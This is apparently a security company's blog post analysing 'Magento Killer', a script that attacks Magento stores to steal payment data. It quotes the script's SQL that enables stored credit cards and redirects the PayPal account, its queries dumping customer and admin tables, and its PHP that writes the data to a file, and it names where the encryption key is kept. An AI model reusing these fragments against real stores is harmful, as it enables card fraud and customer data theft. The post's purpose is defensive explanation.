Start typing and press Enter to search

Magento Killer: A new ecommerce security threat

Magento killer is the latest ecommerce security threat which allows the attacker to modify data in core_config_data table from the Magento database. The scope of this attack is to steal users payment data.

First, the script uses some special base64 encoded SQL Queries:

$ConfKiller = array( 
         'Update DB (Savecc)' =>
//UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'payment/ccsave/active', `value` = '1' WHERE `path` = 'payment/ccsave/active';
         'Update PP (MailPP)' =>
//UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'paypal/general/business_account', `value` = '[redacted]@gmail.com' WHERE `path` = 'paypal/general/business_account';

With the two objects from the array, the attacker wants to:

  • Update DB (Savecc): Configures the Magento website to save client credit card information on the server, instead of sending it to the typical destination — a payment processor (e.g authorize.net).
  • Update PP (MailPP): Changes the PayPal merchant business account associated with the Magento site to whatever the hacker wants.

The credit card information is encrypted, but if the attacker has access to the filesystem, the encryption key can be found in ./app/etc/local.xml

Having the encryption key, the attacker can new decrypt the credit card information into plaintext and use it to make fraudulent transaction or even sell the stolen data.

The hacker also needs the customer information from the database in order to use the stolen payment data. They’ll be looking for the correct name, email address, physical mailing address, and other billing information associated with the stolen credit card.

For the the customer information, the attacker used another SQL Query:

$query = array(
'admin_user'                        => 'SELECT * FROM admin_user' ,
'aw_blog_comment'                   => 'SELECT * FROM aw_blog_comment' ,
'core_email_queue_recipients'       => 'SELECT * FROM core_email_queue_recipients' ,
'customer_entity'                   => 'SELECT * FROM customer_entity' ,

With all the data the attacker needs, it generates a *-shcMail.txt file in the directory containing the relevant customer information.

$namefile = md5(time())."-shcMail.txt";
foreach ($query as $shc_key => $shc_query) {
$hasil = mysql_query($shc_query);
    while ( $kolom_db = mysql_fetch_assoc($hasil) ) {
        $mail[] = $kolom_db[$shcolom[$shc_key]];
        $myfile = fopen($namefile, "a+") or die("Unable to open file!");
        fwrite($myfile, $kolom_db[$shcolom[$shc_key]]."\r\n");

Running this script in a browser, it simply provides a hyperlink to the generated *-shcMail.txt file. Then it reports back to inform the attacker if the initial two-setting changes were successful or not.

If you think your Magento installation has been compromised, we would be glad to help you.

Check our offer and you can contact us or make a pricing request.

We can help you stay safe!

We also know how important costs are.

You should also read

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.